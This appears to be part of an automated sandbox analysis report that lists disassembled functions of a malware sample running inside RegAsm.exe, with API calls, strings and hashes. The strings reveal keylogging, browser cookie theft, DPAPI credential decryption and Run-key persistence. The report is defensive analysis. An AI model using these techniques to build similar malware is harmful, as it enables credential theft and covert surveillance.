                                                        • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                        • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                                                        Function 004440E8 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _free.LIBCMT ref: 00444106
                                                          • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                          • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                        • _free.LIBCMT ref: 00444118
                                                        • _free.LIBCMT ref: 0044412B
                                                        • _free.LIBCMT ref: 0044413C
                                                        • _free.LIBCMT ref: 0044414D
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                        • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                                                        • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                        • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                                                        Function 0044BAB7 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PkGNG
                                                        • API String ID: 0-263838557
                                                        • Opcode ID: 5e00ae4c16f04a5a408ad6ef1dd4f82ff0aaed16414488ba1079334ecebbb015
                                                        • Instruction ID: da8fb74aa53f7b39327717419ea6793f6800af9799f3d5c2cf6102f7e15971fb
                                                        • Opcode Fuzzy Hash: 5e00ae4c16f04a5a408ad6ef1dd4f82ff0aaed16414488ba1079334ecebbb015
                                                        • Instruction Fuzzy Hash: 1451C171D00209AAEF109FA5D885BAFBBB8EF45314F14015FE905A7291CB38D911CBA9
                                                        Function 0044E769 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _strpbrk.LIBCMT ref: 0044E7B8
                                                        • _free.LIBCMT ref: 0044E8D5
                                                          • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043BD6A
                                                          • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417), ref: 0043BD8C
                                                          • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000), ref: 0043BD93
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                        • String ID: *?$.
                                                        • API String ID: 2812119850-3972193922
                                                        • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                        • Instruction ID: bbc13fc8ee10fdca904a4e9292213e09ebfa005f106ef5a16faeda3ce4fd08f7
                                                        • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                        • Instruction Fuzzy Hash: C251B175E00209AFEF14DFAAC881AAEF7B5FF58314F24416EE844E7341E6399A018B54
                                                        Function 00415B25 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CountEventTick
                                                        • String ID: !D@$NG
                                                        • API String ID: 180926312-2721294649
                                                        • Opcode ID: 1409f91683eb0d13268e59a75ed27cf67ebd121d06af2735119167055e625867
                                                        • Instruction ID: 3ac9408315e1e6036cedb879f74fb80cbd33a95067926c5a5f9e9f7d680cff10
                                                        • Opcode Fuzzy Hash: 1409f91683eb0d13268e59a75ed27cf67ebd121d06af2735119167055e625867
                                                        • Instruction Fuzzy Hash: 3E51A5315082019AC724FB32D852AFF73A5AF94304F50483FF54A671E2EF3C5945C68A
                                                        Function 00409EDE Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 157COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                                                          • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                                          • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041C5BB
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                        • String ID: XQG$NG$PG
                                                        • API String ID: 1634807452-3565412412
                                                        • Opcode ID: fd0e2637303639c3914413e18f481dca8088ebaee1bdd9cde4e16d3ac9440c52
                                                        • Instruction ID: 86122f73fea86c9dce3a8c8dcd7d10d1556e7c038dfd98f63e082762e027ad1b
                                                        • Opcode Fuzzy Hash: fd0e2637303639c3914413e18f481dca8088ebaee1bdd9cde4e16d3ac9440c52
                                                        • Instruction Fuzzy Hash: 955120315082419BC328FB32D851AEFB3E5AFD4348F50493FF54AA71E2EF78594A8649
                                                        Function 004434D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443515
                                                        • _free.LIBCMT ref: 004435E0
                                                        • _free.LIBCMT ref: 004435EA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$FileModuleName
                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        • API String ID: 2506810119-1068371695
                                                        • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                        • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                                        • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                        • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                                        Function 0044B89F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101fileCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,FF8BC35D,00000000,?,PkGNG,0044BBFE,?,00000000,FF8BC35D), ref: 0044B952
                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0044B980
                                                        • GetLastError.KERNEL32 ref: 0044B9B1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ByteCharErrorFileLastMultiWideWrite
                                                        • String ID: PkGNG
                                                        • API String ID: 2456169464-263838557
                                                        • Opcode ID: f851102e1cc74a1ce765c461dca65e8698d1b877b070f44673effa5d02d51bb5
                                                        • Instruction ID: 31ac96f82a5847659344ef20b41dc67af7a50504b34fbd786f6314a6cc22fa3b
                                                        • Opcode Fuzzy Hash: f851102e1cc74a1ce765c461dca65e8698d1b877b070f44673effa5d02d51bb5
                                                        • Instruction Fuzzy Hash: B13161B5A102199FDB14CF59DD819EAB7B9FB08305F0444BEE90AD7251D734ED80CBA4
                                                        Function 0040404C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                          • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041BA30
                                                          • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                          • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                          • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                        • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                        • String ID: /sort "Visit Time" /stext "$0NG
                                                        • API String ID: 368326130-3219657780
                                                        • Opcode ID: e78c06b9bf7766e7fe0f8007d50d57f34ca1e93f8206c7928855f49078e072bb
                                                        • Instruction ID: 7a7c83aa22bf4ff3424ba87d95d637a61540eed1193ecfb54830ab602693969f
                                                        • Opcode Fuzzy Hash: e78c06b9bf7766e7fe0f8007d50d57f34ca1e93f8206c7928855f49078e072bb
                                                        • Instruction Fuzzy Hash: 2C316371A0011956CB15FBA6DC569ED7375AF90308F00007FF60AB71E2EF785D49CA99
                                                        Function 0041CA73 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SystemParametersInfoW.USER32 ref: 0041CB68
                                                          • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046612C), ref: 004137B9
                                                          • Part of subcall function 004137AA: RegSetValueExA.ADVAPI32(0046612C,?,00000000,?,00000000,00000000), ref: 004137E1
                                                          • Part of subcall function 004137AA: RegCloseKey.ADVAPI32(0046612C), ref: 004137EC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseCreateInfoParametersSystemValue
                                                        • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                        • API String ID: 4127273184-3576401099
                                                        • Opcode ID: f5c8ef2c27851cf1013244d94d6a0450d36d3a4faca39a9ae70033779c708183
                                                        • Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
                                                        • Opcode Fuzzy Hash: f5c8ef2c27851cf1013244d94d6a0450d36d3a4faca39a9ae70033779c708183
                                                        • Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
                                                        Function 0041631F Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _wcslen.LIBCMT ref: 00416330
                                                          • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                          • Part of subcall function 004138B2: RegSetValueExA.ADVAPI32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                          • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4), ref: 004138E6
                                                          • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _wcslen$CloseCreateValue
                                                        • String ID: !D@$okmode$PG
                                                        • API String ID: 3411444782-3370592832
                                                        • Opcode ID: 33c7808d8a7b0bded71eafecf17113fbf2925580b38271ada3cd576753f1e43b
                                                        • Instruction ID: 097cdf197a66b89fefcd85ce8a19d7acc75244c7017ebd4eb32b8c3ef24b572d
                                                        • Opcode Fuzzy Hash: 33c7808d8a7b0bded71eafecf17113fbf2925580b38271ada3cd576753f1e43b
                                                        • Instruction Fuzzy Hash: 1E11A571B442011BDA187B32D862BBD22969F84348F80843FF546AF2E2DFBD4C51975D
                                                        Function 0040C627 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6C3
                                                        Strings
                                                        • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                                        • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExistsFilePath
                                                        • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                        • API String ID: 1174141254-1980882731
                                                        • Opcode ID: 94e3019874633fdbfa545aa7663ce5ff9a408d6cc8816db895689c957fef93bc
                                                        • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                                                        • Opcode Fuzzy Hash: 94e3019874633fdbfa545aa7663ce5ff9a408d6cc8816db895689c957fef93bc
                                                        • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                                                        Function 0040C6F6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C792
                                                        Strings
                                                        • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                                        • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExistsFilePath
                                                        • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                        • API String ID: 1174141254-1980882731
                                                        • Opcode ID: cd02b2d6f0091136f3bd33ffae0826dfdd9dcae469dd48ae7039cc879f52ebfc
                                                        • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                                                        • Opcode Fuzzy Hash: cd02b2d6f0091136f3bd33ffae0826dfdd9dcae469dd48ae7039cc879f52ebfc
                                                        • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
                                                        Function 0040A1B4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateThread.KERNEL32(00000000,00000000,0040A2B8,004750F0,00000000,00000000), ref: 0040A239
                                                        • CreateThread.KERNEL32(00000000,00000000,0040A2A2,004750F0,00000000,00000000), ref: 0040A249
                                                        • CreateThread.KERNEL32(00000000,00000000,0040A2C4,004750F0,00000000,00000000), ref: 0040A255
                                                          • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
                                                          • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateThread$LocalTimewsprintf
                                                        • String ID: Offline Keylogger Started
                                                        • API String ID: 465354869-4114347211
                                                        • Opcode ID: 460aeebbd05c9109f8f1e9d4cf1c4a7c90257216c04fbe0fa29816e89daae231
                                                        • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                                                        • Opcode Fuzzy Hash: 460aeebbd05c9109f8f1e9d4cf1c4a7c90257216c04fbe0fa29816e89daae231
                                                        • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                                        Function 0040AF29 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
                                                          • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                          • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                        • CreateThread.KERNEL32(00000000,00000000,0040A2A2,?,00000000,00000000), ref: 0040AFA9
                                                        • CreateThread.KERNEL32(00000000,00000000,0040A2C4,?,00000000,00000000), ref: 0040AFB5
                                                        • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateThread$LocalTime$wsprintf
                                                        • String ID: Online Keylogger Started
                                                        • API String ID: 112202259-1258561607
                                                        • Opcode ID: 77df2eb5e9a30333ff56a104ce6f74fac6c8f24925e0e44ba138bd3ce2eab701
                                                        • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                                                        • Opcode Fuzzy Hash: 77df2eb5e9a30333ff56a104ce6f74fac6c8f24925e0e44ba138bd3ce2eab701
                                                        • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                                                        Function 0041B580 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 59timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LocalTime
                                                        • String ID: | $%02i:%02i:%02i:%03i $PkGNG
                                                        • API String ID: 481472006-3277280411
                                                        • Opcode ID: d9bff088cb76c426919b24c8266bea5d45f0a8ea700e32831e669085e32f1d03
                                                        • Instruction ID: 036da7e0cd4114b6fa9428aab3af546923e8b827a5fb64715830670d2b1b9b5a
                                                        • Opcode Fuzzy Hash: d9bff088cb76c426919b24c8266bea5d45f0a8ea700e32831e669085e32f1d03
                                                        • Instruction Fuzzy Hash: 091190714082455AC304FB62D8519FFB3E9AB84348F50093FF88AA21E1EF3CDA45C69E
                                                        Function 00404F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLocalTime.KERNEL32(?), ref: 00404F81
                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FCD
                                                        • CreateThread.KERNEL32(00000000,00000000,00405150,?,00000000,00000000), ref: 00404FE0
                                                        Strings
                                                        • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Create$EventLocalThreadTime
                                                        • String ID: KeepAlive | Enabled | Timeout:
                                                        • API String ID: 2532271599-1507639952
                                                        • Opcode ID: a02ae91ac195284b5da0ea0fcd2ef2636c7927f14dee073a7222123f061fd718
                                                        • Instruction ID: 41fa32a9fb91b1633a7afb8999ae97baef60c60c8d6252053b050d354fdafbcf
                                                        • Opcode Fuzzy Hash: a02ae91ac195284b5da0ea0fcd2ef2636c7927f14dee073a7222123f061fd718
                                                        • Instruction Fuzzy Hash: 82110A71800385BAC720A7779C0DEAB7FACDBD2714F04046FF54162291D6B89445CBBA
                                                        Function 00406A9E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(crypt32), ref: 00406ABD
                                                        • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: CryptUnprotectData$crypt32
                                                        • API String ID: 2574300362-2380590389
                                                        • Opcode ID: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                        • Instruction ID: 59ed3cbb63f31e38ea488d6bd85f24bb9ff1ce5495ed4d1509158228521d53cd
                                                        • Opcode Fuzzy Hash: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                        • Instruction Fuzzy Hash: 2C01B975604216BBCB18CFAD9D449AF7BB4AB45300B00417EE956E3381DA74E9008B95
                                                        Function 0044C2D3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000), ref: 0044C30C
                                                        • GetLastError.KERNEL32 ref: 0044C316
                                                        • __dosmaperr.LIBCMT ref: 0044C31D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorFileLastPointer__dosmaperr
                                                        • String ID: PkGNG
                                                        • API String ID: 2336955059-263838557
                                                        • Opcode ID: 97215d8b8c2dce734124090270f13308d8b04423b03663272671d6b8c31aea6f
                                                        • Instruction ID: 8193a85edd99f1e073baf55791db2896ff72ac9ff19ac05387a69161c0de0417
                                                        • Opcode Fuzzy Hash: 97215d8b8c2dce734124090270f13308d8b04423b03663272671d6b8c31aea6f
                                                        • Instruction Fuzzy Hash: FB019032A11108BBDB01DFDDDC4586E7B19EB81320B28034EFD2097280EAB4DD119794
                                                        Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                        • CloseHandle.KERNEL32(?), ref: 004051CA
                                                        • SetEvent.KERNEL32(?), ref: 004051D9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseEventHandleObjectSingleWait
                                                        • String ID: Connection Timeout
                                                        • API String ID: 2055531096-499159329
                                                        • Opcode ID: 638b915a1fb33ffee36d9cd6321bbf62091d502496d276d1835a730be56b6213
                                                        • Instruction ID: b176daa04f7f78a72cd0d213bf0bcd41e0e3849ccec9e2477ca34bbc74fb9340
                                                        • Opcode Fuzzy Hash: 638b915a1fb33ffee36d9cd6321bbf62091d502496d276d1835a730be56b6213
                                                        • Instruction Fuzzy Hash: C901F530940F00AFD7216B368D8642BBFE0EF00306704093EE68356AE2D6789800CF89
                                                        Function 0040E800 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Exception@8Throw
                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                        • API String ID: 2005118841-1866435925
                                                        • Opcode ID: e1bdae5122e534e22181349a294e5dd283a76e5484cb2b4dd901af9da0e19607
                                                        • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                                                        • Opcode Fuzzy Hash: e1bdae5122e534e22181349a294e5dd283a76e5484cb2b4dd901af9da0e19607
                                                        • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                                                        Function 0041CB72 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,00474EF8,00474EF8,PkGNG,00404A40), ref: 0041CB9A
                                                        • LocalFree.KERNEL32(?,?), ref: 0041CBC0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FormatFreeLocalMessage
                                                        • String ID: @J@$PkGNG
                                                        • API String ID: 1427518018-1416487119
                                                        • Opcode ID: 43e67b6722ad7e97e4d7411bd93802a0b45ac2c2c041eafaafa940aa2d942fec
                                                        • Instruction ID: 923000db8f6a2d31ebee0df48ef62036c6bc2ff20d3f060cbaedccf048ea6ec3
                                                        • Opcode Fuzzy Hash: 43e67b6722ad7e97e4d7411bd93802a0b45ac2c2c041eafaafa940aa2d942fec
                                                        • Instruction Fuzzy Hash: 34F0A930B00219A6DF14A766DC4ADFF772DDB44305B10407FB605B21D1DE785D059659
                                                        Function 0041384F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041385A
                                                        • RegSetValueExW.ADVAPI32 ref: 00413888
                                                        • RegCloseKey.ADVAPI32(?), ref: 00413893
                                                        Strings
